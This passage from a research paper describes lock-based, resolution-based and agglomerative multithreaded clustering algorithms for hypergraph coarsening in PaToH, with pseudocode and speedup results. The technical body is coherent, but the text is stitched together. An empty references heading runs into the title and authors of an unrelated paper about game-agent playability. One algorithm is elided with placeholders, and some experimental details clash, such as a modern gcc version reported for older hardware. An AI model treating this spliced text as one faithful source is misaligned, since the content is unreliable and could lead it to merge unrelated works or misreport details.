In order to avoid building an extremely large cluster (which would cause load balancing problems in the initial partitioning and refinement phases), we also enforce that the weight of a cluster must be smaller than a given value `maxW`. Our experience shows that such a restriction is not needed in matching-based clustering, since at each level at most two vertices can be clustered together. In Algorithm 2, we use the total shared net cost (heavy connectivity clustering) as the similarity metric. In practice (and in our experiments), we use the absorption clustering metric (implemented in PaToH), which divides the contribution of each net by the number of its pins. That is, a net `n` contributes `c[n]/|pins[n]|` to the similarity value instead of `c[n]`. This metric favors clustering vertices connected via nets of small sizes. The sequential code in PaToH also divides the overall similarity score between two vertices by the weight of the cluster which will contain `u` (the value `totW` at line 1). Hence, to compare the performance of our multithreaded clustering algorithms with PaToH, we also use this modified similarity metric in our implementations. However, for simplicity, we will continue to use the heavy connectivity clustering metric in the paper.

### C. Metrics

We define the metrics of cardinality and quality to compare different clustering methods. The cardinality of a clustering is the number of clustering decisions taken by an algorithm, i.e., the number of vertex (or vertex–cluster) pairs that are put together across the levels. The quality of a clustering is the sum of the similarity scores of these decisions; in the multi-level framework, the cardinality determines the reduction in the number of vertices between two consecutive coarsening levels.

### D. Related work

For a given hypergraph $\mathcal{H}=(\mathcal{V}, \mathcal{N})$, let $A$ be the vertex-net incidence matrix, i.e., the rows of $A$ correspond to the vertices of $\mathcal{H}$, and the columns of $A$ correspond to the nets of $\mathcal{H}$ such that $a_{vn} = 1$ iff $v \in \text{pins}[n]$. Consider now the symmetric matrix $M = AA^T - \text{diag}(AA^T)$. The matrix $M$ can be effectively represented by an undirected graph $G(M)$ with $|\mathcal{V}|$ vertices and an edge of weight $m_{uv}$ between two vertices $u$ and $v$ if $m_{uv} \neq 0$. That is, there is a one-to-one correspondence between the vertices of $\mathcal{H}$ and those of $G(M)$. As $m_{uv} \neq 0$ iff the vertices $u$ and $v$ of $\mathcal{H}$ are adjacent, the correspondence implies that a matching among the vertices of $\mathcal{H}$ corresponds to a matching on the vertices of $G(M)$. Therefore, various matching algorithms and heuristics for graphs can be used on $G(M)$ to find a matching among the vertices of $\mathcal{H}$. Bisseling and Manne [21] propose a distributed-memory, 1/2-approximate algorithm to find weighted matchings in graphs. Building on this work, Çatalyürek et al. [22] present efficient distributed-memory parallel algorithms and scalable implementations. Halappanavar et al. [23] present an efficient shared-memory implementation for computing 1/2-approximate weighted matchings. For the maximum cardinality matching problem, in a recent work, Patwary et al. [24] propose a distributed-memory, sub-optimal algorithm. There are a number of reasons why we cannot use the aforementioned algorithms. First and foremost, storing the graph $G(M)$ requires a large amount of memory, and the time required to compute this graph is about as costly as computing a matching in $\mathcal{H}$ in a sequential execution.
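For concreteness, here is a naive sketch of materializing $M = AA^T - \text{diag}(AA^T)$ from the pin lists (dense and with our own names purely for illustration; the text's point is precisely that building $G(M)$ explicitly is too costly in time and memory for large hypergraphs):

```c
/* Sketch: build the dense matrix M = A*A^T - diag(A*A^T) from net pin
 * lists. m_{uv} counts the nets shared by u and v (unit net weights).
 * M must be a zero-initialized array of nverts*nverts ints. */
static void build_M(int nverts, int nnets, const int *xpins,
                    const int *pins, int *M) {
    for (int n = 0; n < nnets; n++)
        for (int i = xpins[n]; i < xpins[n + 1]; i++)
            for (int j = xpins[n]; j < xpins[n + 1]; j++) {
                int u = pins[i], v = pins[j];
                if (u != v)                       /* drop the diagonal */
                    M[u * nverts + v] += 1;       /* a_{un} * a_{vn}   */
            }
}
```

Even this sketch already performs $\sum_{n} |\text{pins}[n]|^2$ work, i.e., as much as a whole sequential clustering pass, before any matching has been computed.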
Second, it is our experience (with the coarsening algorithms within the multi-level partitioner PaToH) that one does not need a maximum weighted matching, nor a maximum cardinality one, nor an approximation guarantee to find helpful coarsening schemes. Third, while matching the vertices of a hypergraph, we sometimes need to prevent matched vertices from becoming too big, or to favor vertex clusters with smaller weights (due to the multi-level nature of the partitioning algorithm) and vertices that are mostly related via nets of smaller size. These modifications can be incorporated into the graph $G(M)$ by adjusting the edge weights (or by leaving some edges out). This will help reduce the memory requirements of the graph-matching-based algorithms; however, the computational cost of constructing the graph remains the same. Almost all of the most effective sequential clustering algorithms implemented in PaToH for coarsening purposes have the same worst-case time complexity but are much faster in practice. We, therefore, cannot afford to build the graph $G(M)$ or its modified versions and call existing graph matching algorithms. Furthermore, agglomerative clustering cannot be realized by using the aforementioned algorithms. We highlight that the matching-based clustering algorithms considered in this paper can be perceived as graph matching algorithms adjusted to work on an implicit representation of the graph $G(M)$ or its modified versions. However, to the best of our knowledge, there is no immediate parallel graph-matching-based algorithm that is analogous to the agglomerative clustering algorithms considered in this work (although variants of agglomerative coarsening for graphs exist, see for example [25] and [26]). As a sanity check, we implemented a modified version of the sequential 1/2-approximation algorithm of Halappanavar et al. [23] which works directly on hypergraphs.
In other words, instead of explicitly constructing the graph $G(M)$, the adjacencies of the vertices are constructed on the fly, as in Algorithm 1. We compared the quality and cardinality of this algorithm with those of the greedy sequential matching HCM. The approximation algorithm obtained matchings whose quality was 14% better, while the cardinalities were the same. However, this good performance comes with a significant execution time overhead, yielding a 6.5 times slower execution. When we integrated the 1/2-approximation algorithm into the coarsening phase of PaToH, we observed that the better matching quality helps the partitioner to obtain a better cutsize. For example, when the partitioner is executed 10 times with random seeds, the average cutsize of the 1/2-approximation algorithm is 8% better than the one obtained by using HCM. However, when we compare the minimum of these cutsizes, HCM outperforms the approximation algorithm by 2%. Moreover, the difference between the minimum cut obtained by using HCM and the average cut obtained by using the approximation algorithm is 14% in favor of HCM. After these preliminary experiments, we decided to parallelize HCM and HCC, since they are much faster and one can obtain better cutsizes by using them.

III. MULTITHREADED CLUSTERING FOR COARSENING

In this section, we present three novel parallel greedy clustering algorithms. The first two are matching-based and the third one is a greedy agglomerative clustering method.

A. Multithreaded matching algorithms

To adapt the greedy sequential matching algorithm to multithreaded architectures, we use two different approaches. In the first one, we employ a locking mechanism which prevents inconsistent matching decisions between the threads. In the second approach, we let the algorithm run almost without any modifications and then use a conflict resolution mechanism to create a consistent matching. The lock-based algorithm is given in Algorithm 3.
The structure of the algorithm is similar to the sequential one except for lines 2 and 5, where we use the atomic CHECKANDLOCK operation. To lock a vertex $u$, this operation first checks whether $u$ is already locked. If not, it locks $u$ and returns true; otherwise, it returns false. Its atomicity guarantees that a locked vertex is never considered for a matching. That is, both the visited vertex $u$ (at line 1) and the adjacent vertex $v$ must be successfully locked before the matching of $u$ and $v$ is considered. If both locks are acquired, and the similarity of $v$ is bigger than the current best (at line 3), the algorithm keeps $v$ as the best candidate $v^*$. When a better candidate is found, the old one is UNLOCKed to make it available for other threads (line 6), and to construct better matchings in terms of cardinality and quality. As a different approach without a lock mechanism, we modify the sequential code slightly and execute it in a multithreaded environment. If the for loop at line 1 of Algorithm 1 is executed in parallel, different threads may set rep$[u]$ to different values for a vertex $u$. Hence, the rep array will contain inconsistent decisions. To solve this issue, one can make each thread use a private rep array and store all of its matching decisions locally; a consistent matching can then be devised from this information in another phase. Another idea is keeping the sequential code (almost) as is, letting the threads create conflicts, and resolving the conflicts later. Our preliminary experiments show that there is not much difference between the performances of these two approaches in terms of cardinality and quality. However, the first one requires more memory: one rep array per thread compared to a shared one. Hence, we followed the second idea and use a conflict resolution scheme with $O(|V|)$ complexity. Algorithm 4 shows the pseudocode of our parallel resolution-based algorithm.
Algorithm 4: Parallel resolution-based matching

**Data:** $\mathcal{H} = (\mathcal{V}, \mathcal{N})$, rep

    for each vertex $u \in \mathcal{V}$ in parallel do
        if rep$[u]$ = null then
            adj$[u] \leftarrow \{\}$
            for each net $n \in \text{nets}[u]$ do
                for each vertex $v \in \text{pins}[n]$ do
                    if rep$[v]$ = null then
                        if $v \notin$ adj$[u]$ then
                            adj$[u] \leftarrow$ adj$[u] \cup \{v\}$
                        conn$[v] \leftarrow$ conn$[v] + c[n]$
            $v^* \leftarrow u$; conn$^* \leftarrow 0$
            for each vertex $v \in$ adj$[u]$ do
                if conn$[v] >$ conn$^*$ then
                    conn$^* \leftarrow$ conn$[v]$
                    $v^* \leftarrow v$
                conn$[v] \leftarrow 0$
            if $v^* \neq u$ and rep$[u]$ = rep$[v^*]$ = null then
                rep$[u] \leftarrow v^*$
                rep$[v^*] \leftarrow u$
    for each vertex $u \in \mathcal{V}$ in parallel do
        $v \leftarrow$ rep$[u]$
        if $v \neq$ null and $u \neq$ rep$[v]$ then
            rep$[u] \leftarrow$ null
    for each vertex $u \in \mathcal{V}$ in parallel do
        $v \leftarrow$ rep$[u]$
        if $v \neq$ null and $u < v$ then
            rep$[u] \leftarrow u$

Our conflict resolution scheme consists of the last two loops of Algorithm 4. Note that instead of setting a fixed representative for the matched vertices $u$ and $v^*$, we set their rep values to each other. This bidirectional information is then used in our resolution scheme to check whether the rep array contains inconsistent information. That is, if $u \neq \text{rep}[\text{rep}[u]]$ for a vertex $u$, we know that at least two threads matched either $u$ or $\text{rep}[u]$ with different vertices. If this is the case, the resolution scheme acts greedily and aggressively sets $\text{rep}[u]$ to null, indicating that $u$ will remain unmatched. After the first resolution loop, which is executed in parallel, the rep array contains matching decisions that are consistent with each other. Then, with the last parallel loop, we set the representatives for each matched pair. The proposed resolution scheme is sufficient to obtain a valid matching in the multithreaded setting.
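The $O(|V|)$ resolution pass can be sketched in C with OpenMP as follows (a minimal sketch under our own naming, where $-1$ plays the role of null): only bidirectional choices survive the first loop, and the second loop makes the smaller id of each surviving pair the representative.

```c
/* Sketch of the conflict-resolution loops of Algorithm 4.
 * On entry, rep[] holds each vertex's (possibly conflicting) choice;
 * rep[u] == -1 means u is unmatched. After the call, rep[u] is the
 * representative of u's pair, or -1 if u stays unmatched. */
static void resolve(int nverts, int *rep) {
    #pragma omp parallel for
    for (int u = 0; u < nverts; u++) {
        int v = rep[u];
        if (v != -1 && rep[v] != u)
            rep[u] = -1;            /* choice was not mutual: drop it */
    }
    #pragma omp parallel for
    for (int u = 0; u < nverts; u++) {
        int v = rep[u];
        if (v != -1 && u < v)
            rep[u] = u;             /* now rep[u] == rep[v] == u */
    }
}
```

Note that for a mutual pair with $u < v$, setting rep$[u] \leftarrow u$ suffices: rep$[v]$ already equals $u$, so both vertices end up pointing at the same representative.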
However, we slightly modify Algorithm 1 to obtain better matchings. Since each conflict will probably cost a pair, and losing a pair reduces the matching cardinality and hence the quality, we want as few conflicts as possible. To avoid them, while gathering the adjacency of $u$ in Algorithm 4, we check whether a vertex $v$ adjacent to $u$ is already matched; an already matched candidate is not considered as a possible mate for $u$. Furthermore, we verify once more that $u$ and the chosen candidate are still unmatched right before matching them. This check is necessary since either of them could have been matched by another thread after the current one started considering them.

B. Multithreaded agglomerative clustering

To adapt the sequential agglomerative clustering algorithm to the multithreaded setting, we use the same lock-based approach as in Algorithm 3. The pseudocode of the parallel agglomerative clustering algorithm is given in Algorithm 5. The algorithm visits the vertices in parallel, and when a thread visits a vertex $u$, it tries to lock $u$. If $u$ is already locked, the thread skips $u$ and visits the next vertex. If the lock is acquired but $u$ is already a member of a cluster, the thread unlocks $u$; this is necessary since a clustered vertex cannot be the source of a new cluster. On the other hand, if $u$ is a singleton vertex, the thread continues by computing the similarity values for each adjacent vertex and then traverses the adjacency list $\text{adj}_u$ along the same lines as the sequential algorithm. The main difference here is the lock request for the candidate $v^*$, which is either $v$ itself if $v$ is a singleton, or the representative of the cluster that $v$ resides in. This lock must be acquired before $v^*$ is considered as a matching candidate. However, if $v^*$ is already the current best candidate, no new lock is needed (since the thread has already grabbed $v^*$).
When the lock is granted, the thread checks whether the adjacent vertex $v$, which was a singleton before, has been assigned to a cluster by another thread. If this is the case, the thread unlocks the representative and continues with the next adjacent vertex. Otherwise, it recomputes the total weight of $u$ and $v^*$ (line 3), since new vertices might have been inserted into $v^*$’s cluster by other threads. Since insertions can only increase $w[v^*]$ and $\text{conn}[v^*]$, we do not need to compare $\text{conn}[v^*]$ with $\text{conn}^*$ again. On the other hand, since we cannot construct clusters with large weights, we need to check whether $\text{totW}$ is still smaller than $\text{maxW}$ (line 4). When the best candidate $v^*$ is found, we put $u$ in the cluster $v^*$ represents and update the rep and w arrays accordingly. Unlike in the matching-based algorithms, a cluster is allowed to be a candidate more than once throughout the execution. Hence, at the end of the iteration (lines 5 and 6), we unlock all the vertices that were locked during this iteration.

C. Implementation Details

To obtain the lock functionality for the multithreaded clustering algorithms described in the previous section, we use the compare-and-exchange CPU instruction which exists in x86 and Itanium architectures. We first allocate a lock array of length $|\mathcal{V}|$ and initialize all entries to 0. For each call of the corresponding built-in function in C, `__sync_bool_compare_and_swap`, the entry related to the lock request is compared with 0. In case of equality, it is set to 1, and the function returns true. On the other hand, if the entry is not 0, the function returns false. To unlock a vertex, we simply set the related entry in the lock array to 0. Although this function provides great support and flexibility for concurrency, our preliminary experiments show that it can also reduce the efficiency of a multithreaded algorithm.
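A minimal sketch of this CHECKANDLOCK/UNLOCK scheme with the GCC built-in (the fixed array size and the function names are our assumptions for illustration):

```c
/* Sketch of the lock array scheme described in the text.
 * lockarr[v] == 0 means vertex v is unlocked; statics are zero-initialized. */
static int lockarr[1024];

static int checkandlock(int v) {
    /* atomically: if lockarr[v] == 0, set it to 1 and return nonzero */
    return __sync_bool_compare_and_swap(&lockarr[v], 0, 1);
}

static void unlock_vertex(int v) {
    lockarr[v] = 0; /* releasing is a plain store in this scheme */
}
```

A second `checkandlock` on the same vertex fails until `unlock_vertex` is called, which is exactly the guarantee the matching loops rely on.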
To alleviate this, we try to reduce the number of calls to this function by adding an if statement before each lock request, which helps us see whether the lock is really necessary. We observe significant improvements in the execution times due to these additional if statements. For example, the parallel lock-based matching algorithm described in the previous section should be implemented as in Algorithm 6 to make it much faster. We stress that the if statements at lines 1 and 3 do not change anything in the execution flow. That is, if a vertex is not locked, it cannot be matched either, since a matched vertex always stays locked. Hence, everything that can pass the lock requests (lines 2 and 4) can also pass the preceding if statements; the opposite, however, is not true. We used the same hypergraph data structure as PaToH. We store the ids of the vertices of each net $n$, that is its pins, consecutively in an array ids of size $\sum_{n \in \mathcal{N}} |\text{pins}[n]|$. We also keep another array xids of size $|\mathcal{N}| + 1$, which stores the start index of each net’s pins. Hence, in our implementation, the pins of a net $n$, denoted by $\text{pins}[n]$ in the pseudocodes, are stored in ids[xids[$n$]] through ids[xids[$n+1$] $-$ 1]. With the data structures above, the computational complexity of the clustering algorithms in this paper is in the order of $\sum_{n \in \mathcal{N}} |\text{pins}[n]|^2$, since all non-loop lines in their pseudocodes have $\mathcal{O}(1)$ complexity. For example, in Algorithm 1, to remove matched vertices from $\text{pins}[n]$ (line 3), we keep a pointer array netend of size $|\mathcal{N}|$ where netend[$n$] initially points to the last vertex in $\text{pins}[n]$ for all $n \in \mathcal{N}$.
Then, to execute $\text{pins}[n] \leftarrow \text{pins}[n] \setminus \{v\}$, we only decrease netend[$n$] and swap $v$ with the vertex in the new location. In this way, we also keep the list of vertices connected to each net unchanged, since we only reorder them.

Algorithm 5: Parallel agglomerative clustering

**Data:** $\mathcal{H} = (\mathcal{V}, \mathcal{N})$, maxW, rep

    for each vertex $u \in \mathcal{V}$ in parallel do
        if CHECKANDLOCK($u$) then
            if rep$[u] \neq$ null then
                UNLOCK($u$); continue
            adj$_u \leftarrow \{\}$
            for each net $n \in$ nets$[u]$ do
                for each vertex $v \in$ pins$[n]$ do
                    if $v \notin$ adj$_u$ then
                        adj$_u \leftarrow$ adj$_u \cup \{v\}$
                    conn$[v] \leftarrow$ conn$[v] + c[n]$
            $v^* \leftarrow u$; conn$^* \leftarrow 0$
            for each vertex $v \in$ adj$_u$ do
                if $v = u$ then continue
                $v' \leftarrow$ rep$[v]$
                if $v'$ = null then $v' \leftarrow v$
                if $v' \neq v$ then
                    conn$[v'] \leftarrow$ conn$[v'] +$ conn$[v]$
                    conn$[v] \leftarrow 0$
                    adj$_u \leftarrow$ adj$_u \cup \{v'\} \setminus \{v\}$
                totW $\leftarrow$ w$[u] +$ w$[v']$
                if conn$[v'] >$ conn$^*$ and totW $<$ maxW then
                    if $v' = v^*$ or CHECKANDLOCK($v'$) then
                        if rep$[v] \neq v'$ and rep$[v] \neq$ null then
                            UNLOCK($v'$); continue
                        totW $\leftarrow$ w$[u] +$ w$[v']$
                        if totW $<$ maxW then
                            conn$^* \leftarrow$ conn$[v']$
                            if $v^* \neq u$ then UNLOCK($v^*$)
                            $v^* \leftarrow v'$
                        else if $v' \neq v^*$ then UNLOCK($v'$)
            for each vertex $v \in$ adj$_u$ do
                conn$[v] \leftarrow 0$
            if $u \neq v^*$ then
                rep$[v^*] \leftarrow v^*$
                rep$[u] \leftarrow v^*$
                w$[v^*] \leftarrow$ w$[v^*] +$ w$[u]$
                UNLOCK($v^*$)
            UNLOCK($u$)

Algorithm 6: Parallel lock-based matching, modified

    for each vertex $u \in \mathcal{V}$ in parallel do
        if rep$[u]$ = null then
            [...]
            if CHECKANDLOCK($u$) then
                [...]
                for [...] do
                    [...]
                    if [...] then
                        if rep$[v]$ = null then
                            [...]
                            if CHECKANDLOCK($v$) then
                                [...]
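The xids/ids layout and the netend[] removal trick can be sketched as follows (names mirror the text; the linear search below stands in for the pin position, which is already known during the scan in Algorithm 1):

```c
/* Sketch of the pin storage described in the text: pins of net n are
 * ids[xids[n] .. xids[n+1]-1]; netend[n] is the index of the last
 * *active* pin. Removing a pin swaps it just past netend[n], so the
 * pin list is only reordered, never destroyed. */
typedef struct { int *xids, *ids, *netend; } pinstore;

static void remove_pin(pinstore *ps, int n, int v) {
    for (int i = ps->xids[n]; i <= ps->netend[n]; i++)
        if (ps->ids[i] == v) {
            ps->ids[i] = ps->ids[ps->netend[n]];
            ps->ids[ps->netend[n]] = v;   /* v parked after the active range */
            ps->netend[n]--;              /* shrink the active range by one */
            return;
        }
}
```

Once the pin's position is known, the swap and decrement are $\mathcal{O}(1)$, which is what keeps line 3 of Algorithm 1 constant time.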
In the actual implementation of Algorithm 1, the set adj$_u$ corresponds to an array of maximum size $|\mathcal{V}|$ plus an integer which keeps the number of adjacent vertices in the array. With this pair, the vertex addition (line 5) and reset (line 2) operations take constant time. Furthermore, to find whether a vertex $v$ is a member of adj$_u$ (line 4), we use conn[$v$]: since the net costs are positive, conn[$v$] $>$ 0 if and only if $v \in$ adj$_u$. The implementation of these lines is the same for the other algorithms.

IV. EXPERIMENTAL RESULTS

The algorithms are tested on a computer with 2.27GHz dual quad-core Intel Xeon CPUs with 2-way hyper-threading enabled, and 48GB main memory. All of the algorithms are implemented in C and OpenMP. The compiler is gcc version 11.1, and the -O3 optimization flag is used. To generate our hypergraphs, we used real-life matrices from the University of Florida (UFL) Sparse Matrix Collection (http://www.cise.ufl.edu/research/sparse/matrices). We randomly chose 70 large, square matrices from the collection and created the corresponding hypergraphs using the column-net hypergraph model [2]. An overall summary of the properties of these hypergraphs is given in Table I. The complete list of matrices is at http://bmi.osu.edu/~kamer/multi_coarse_matrices.txt.

Table I
Properties of the hypergraphs used in the experiments

|                 | minimum | maximum    | average   |
|-----------------|---------|------------|-----------|
| # vertices      | 256,000 | 9,845,725  | 1,089,073 |
| # pins          | 786,396 | 57,156,537 | 6,175,717 |
| # pins/vertices | 1.91    | 39.53      | 6.61      |

A. Individual performance of the algorithms

We first compare the performance of the multithreaded clustering algorithms with respect to cardinality, quality, and speedup as standalone clustering algorithms.
1) Performance on cardinality and quality: For matching-based clustering, a matching with the best quality can be found by first constructing the matrix $M = AA^T - \text{diag}(AA^T)$, where $A$ is the vertex-net incidence matrix. A maximum weighted matching in $G(M)$, the associated weighted graph of $M$, is then also a maximum quality matching. We use Gabow’s maximum weighted matching algorithm [27], implemented by Rothberg and distributed as part of the First DIMACS Implementation Challenge (ftp://dimacs.rutgers.edu/pub/netflow). This algorithm has a time complexity of $\mathcal{O}(|V|^3)$ for a graph on $|V|$ vertices and finds a maximum weighted matching in the graph, not necessarily among the maximum cardinality ones. Due to the running time complexity of the maximum quality matching algorithm, it is impractical to obtain the relative performance of the clustering algorithms on our original dataset. We therefore use an additional data set containing considerably smaller matrices. The new dataset contains all 289 square matrices in the UFL sparse matrix collection with at least 3,000 and at most 10,000 rows. We construct the hypergraphs for each of these matrices and find the maximum quality matching on them. The relative performance of an algorithm is computed by dividing its cardinality and quality scores by those of Gabow’s quality matching algorithm. Table II shows the minimum, the maximum, and the geometric mean of all 289 relative performance values for each algorithm. As the table shows, the sequential algorithm and its parallel lock-based variant are within 17–19% of the optimal in terms of quality and almost equal to it in terms of cardinality. Considering the difference in computational complexities, we can argue that their relative performance is reasonably good. The lock-based algorithm performs slightly better than the sequential one.
This demonstrates that, while reducing the execution time, the proposed lock-based parallelization does not hamper the performance of the sequential matching algorithm in terms of either cardinality or quality. For this experiment, the parallel algorithms were executed with 8 threads. Figure 1 shows the performance profiles generated to analyze the results in more detail. A point $(x, y)$ in the profile graph means that with probability $y$, the quality of the matching found by an algorithm is larger than $\max / x$, where $\max$ is the maximum quality for that instance. The figure shows that for this data set, the resolution-based matching attains this performance with only 45% probability. For matchings with at most 15% worse quality than the optimum, the probabilities are 56% and 28% for the lock- and resolution-based algorithms, respectively. Hence, the former performs two times better than the latter. For the original data set with large hypergraphs, the relative performances of the multithreaded algorithms are given with respect to those of their sequential versions. Table III shows the statistics for this experiment.

Table II

| Algorithm        | Quality min | Quality max |
|------------------|-------------|-------------|
| Sequential       | 0.24        | 1.00        |
| Lock-based       | 0.32        | 1.00        |
| Resolution-based | 0.25        | 0.99        |

Table III

| Algorithm        | Quality min | Quality max |
|------------------|-------------|-------------|
| Lock-based       | 0.79        | 1.1         |
| Resolution-based | 0.63        | 1.3         |
| Agglomerative    | 0.56        | 1.3         |

Figure 1.
Performance profiles for sequential and multithreaded matching algorithms with respect to the maximum quality matchings. A point $(x, y)$ in the profile graph means that with probability $y$, the quality of the matching found by an algorithm is more than $\max / x$, where $\max$ is the maximum quality for that instance.

Table IV shows the average numbers of matched vertices and conflicts for the proposed resolution-based algorithm with respect to the number of threads. To compute the averages, we execute the algorithm on each hypergraph ten times and report the geometric mean of these results. As expected, the number of conflicts increases with the number of threads. However, when compared with the cardinality of the matching, the conflicts are at most 0.7% of the total match count for a single graph instance. This shows that the probability of a conflict is very low even with 8 threads.

Table IV
The average matching cardinality and the number of conflicts for the proposed resolution-based algorithm with respect to the number of threads.

| Threads | #match   | #conflict | #conflict/#match |
|---------|----------|-----------|------------------|
| 1       | 290206.9 | 0.0       | 0.000000         |
| 2       | 290103.6 | 17.8      | 0.000061         |
| 4       | 290052.9 | 18.9      | 0.000065         |
| 8       | 289965.9 | 24.1      | 0.000083         |

2) Speedup: Figure 2 shows the speedups achieved by the multithreaded algorithms. On average, the algorithms obtain decent speedups compared to their sequential versions up to 8 threads. In the 8-thread experiments, the resolution-based algorithm has the highest speedup of 5.87, followed by the parallel agglomerative algorithm with a speedup of 5.82. The lock-based algorithm has the lowest speedup, 5.23, in this category.
However, this is still decent, especially when we consider the 5–7% overhead due to OpenMP and atomic operations. To analyze the scalability of the algorithms more closely, we draw the speedup profiles in Figure 3. The resolution-based algorithm has better scalability in general. For example, with 4 threads, the probability that the resolution-based algorithm obtains a speedup of at least 3.2 is 83%; the same probabilities for the lock-based and parallel agglomerative algorithms are 54% and 65%, respectively. With 8 threads, the resolution-based version achieves a speedup of at least 6.6 for 33% of the hypergraphs, whereas the lock-based and parallel agglomerative algorithms achieve the same speedup only for 16% and 20% of them. Hence, the resolution-based algorithm is the best among the ones proposed in this paper in terms of scalability.

B. Multi-level performance of the algorithms

As mentioned in the introduction, we integrated our algorithms into the coarsening phase of PaToH [15]. In this section, we first investigate how our algorithms scale for the clustering operations inside PaToH. The overall performance of a clustering algorithm in such a setting can be different from the standalone performance of the same algorithm, since in the multi-level framework the hypergraphs are coarsened until the coarsest hypergraph is considerably small (for example, until the number of vertices drops below 100). Figure 4 shows that the speedups on the multi-level clustering part are slightly worse than those of the standalone clustering. For example, the average speedups for the 8(4)-thread case are 5.25 (3.22), 5.56 (3.40), and 5.47 (3.23) for the lock-based, resolution-based, and parallel agglomerative algorithms, respectively. Since we only parallelize the clustering operations inside the partitioner, the speedups we obtain on the overall execution time cannot be equal to the number of threads, even in the ideal case.
To find the ideal speedups, we use Amdahl’s law [28]: $$speedup_{ideal} = \frac{1}{(1 - r) + \frac{r}{\#threads}}$$ where $r$ is the ratio of the total clustering time to the total time of a sequential execution. To find the ideal speedup on the average, we compute (4) for each hypergraph and then take the geometric mean, since we do the same for the actual speedups. Figure 5 shows the ideal and actual speedups of the multithreaded algorithms. Since the ideal speedup lines (in dashed style) are drawn by using different sequential algorithms for the matching-based and agglomerative clustering, we separate these two cases and draw two different charts. On average, all the algorithms obtain speedups close to the ideal. Among the matching-based algorithms, the lock-based one is more efficient since its speedup is closer to the ideal. This is interesting since, according to Figure 4, it has less speedup on the total clustering time, which at first sight looks like an anomaly because this is the only part that has been parallelized. However, since the lock-based algorithm’s quality is better (Table III), there is probably less work remaining for the refinement heuristics in the uncoarsening phase. Hence, in total, one can achieve better speedup by using the lock-based algorithm rather than the resolution-based one. We also obtain good speedups with the parallel agglomerative algorithm. For 2, 4, and 8 threads, the algorithm makes PaToH only 6%, 6% and 10% slower, respectively, than the best possible parallel execution time.

Figure 3. Speedup profiles for the multithreaded algorithms: a point $(x, y)$ in the profile graph means that with probability $y$, the speedup obtained by the parallel algorithm will be more than $x$. (a) #threads = 4; (b) #threads = 8.

Figure 4. Speedups on the time spent by the clustering algorithms in the multi-level approach.
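Equation (4) translates directly into code; for instance, with $r = 0.5$ even a perfect 8-thread clustering phase yields an overall speedup of only about 1.78:

```c
/* Amdahl's law as in equation (4): ideal overall speedup when only the
 * clustering part, a fraction r of the sequential time, is parallelized. */
static double ideal_speedup(double r, int nthreads) {
    return 1.0 / ((1.0 - r) + r / nthreads);
}
```

In the limit $r \to 1$ (everything parallelized) the formula recovers a speedup equal to the number of threads, as expected.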
Parallelization of both the matching-based and agglomerative clustering algorithms reduces the total execution time significantly. As mentioned before, matching-based algorithms are faster than the agglomerative ones. However, Figure 6 shows that PaToH is 20–30% faster when an agglomerative algorithm is used in the coarsening phase rather than a matching-based one. According to our experiments, the coarsening phase is indeed 25% slower with the agglomerative clustering algorithm; however, the total execution time is 13% less. The difference comes from the reduction in the time of the initial partitioning and uncoarsening/refinement phases. The initial partitioning takes less time because the coarsest hypergraph has fewer vertices with an agglomerative algorithm. In addition, the agglomerative clustering results in 25% less cutsize compared to the matching-based clustering. Hence, we can claim that it is more suitable for the cutsize definition given in (3).

When equipped with the multithreaded clustering algorithms, the cutsize of the partition found by PaToH is almost equal to the original cutsize obtained by using the sequential versions. For the agglomerative case, the cutsize changes only up to 1%. This is also true for the lock-based matching algorithm when compared with sequential greedy matching. For the resolution-based matching algorithm, there is at most a 3% increase in the cutsize on average. On the other hand, as shown above, the algorithms scale reasonably well.

V. Conclusion

Clustering algorithms are the most time-consuming part of current state-of-the-art hypergraph partitioning tools that follow the multi-level framework. We have investigated the matching-based and agglomerative clustering algorithms.
We have argued that the matching-based clustering algorithms can be perceived as a matching algorithm on an implicitly represented undirected, edge-weighted graph, whereas there is no immediate equivalent for the agglomerative ones. We have proposed two different multithreaded implementations of the matching-based clustering algorithms. The first one uses atomic lock operations to prevent inconsistent matching decisions made by two different threads. The second one lets the threads perform matchings as they would do in a sequential setting and later resolves the conflicts that arise. We have also proposed a multithreaded agglomerative clustering algorithm; this algorithm also uses locks to prevent conflicts.

We have presented different sets of experiments on a large number of hypergraphs. Our experiments have demonstrated that the multithreaded clustering algorithms perform almost as well as their sequential counterparts, sometimes even better, in terms of clustering quality and cardinality. The experiments have also shown that our algorithms achieve decent speedups (the best was 5.87 with 8 threads). We integrated our algorithms into the well-known hypergraph partitioner PaToH. This integration makes PaToH 1.85 times faster, where the ideal speedup is 2.07. In addition, it does not worsen the cutsizes obtained.

We observed that clusterings with better quality help the partitioner to obtain better cuts. Fortunately, the multi-level framework may tolerate slower algorithms that generate better clusterings in terms of cardinality and quality, because such clusterings reduce the time required for the initial partitioning and uncoarsening phases. However, there is a limit to this tolerance: if the algorithm is too slow, one can instead execute the partitioner several times with a faster, parallelizable algorithm that generates clusterings of acceptable quality, and achieve even better cutsizes.
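The resolution-based scheme recapped above can be illustrated with a deliberately simplified, single-process sketch: each "worker" greedily proposes matches over its own vertex range with no synchronization, and a resolution pass keeps only mutually consistent proposals. This is our own toy rendering, not the paper's implementation (which works on the implicitly represented graph, uses OpenMP threads, and has a more refined conflict-resolution step):

```python
def propose(vertices, adj, weight):
    # Each worker independently proposes its heaviest neighbor for every
    # vertex in its range, with no synchronization (where conflicts arise).
    proposal = {}
    for v in vertices:
        candidates = [(weight(v, u), u) for u in adj[v]]
        if candidates:
            proposal[v] = max(candidates)[1]
    return proposal

def resolve(per_worker_proposals):
    # Resolution pass: keep a pair (v, u) only if v and u proposed each
    # other, so each vertex is matched at most once; all other proposals
    # are dropped (a real implementation would retry the losers).
    merged = {}
    for p in per_worker_proposals:
        merged.update(p)
    matching = {}
    for v, u in merged.items():
        if v not in matching and u not in matching and merged.get(u) == v:
            matching[v] = u
            matching[u] = v
    return matching
```

The lock-based alternative would instead guard each match with an atomic test-and-set on the two endpoints, trading conflict-resolution work for synchronization overhead.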
ACKNOWLEDGMENT

This work was supported in parts by the DOE grant DE-FC02-06ER2775 and by the NSF grants CNS-0643969, OCI-0904809, and OCI-0904802.

REFERENCES
Exploring Options for Efficiently Evaluating the Playability of Computer Game Agents

Todd Wareham and Scott Watson
Department of Computer Science
Memorial University of Newfoundland
St. John’s, NL Canada A1B 3X5
Email: harold@mun.ca, saw104@mun.ca

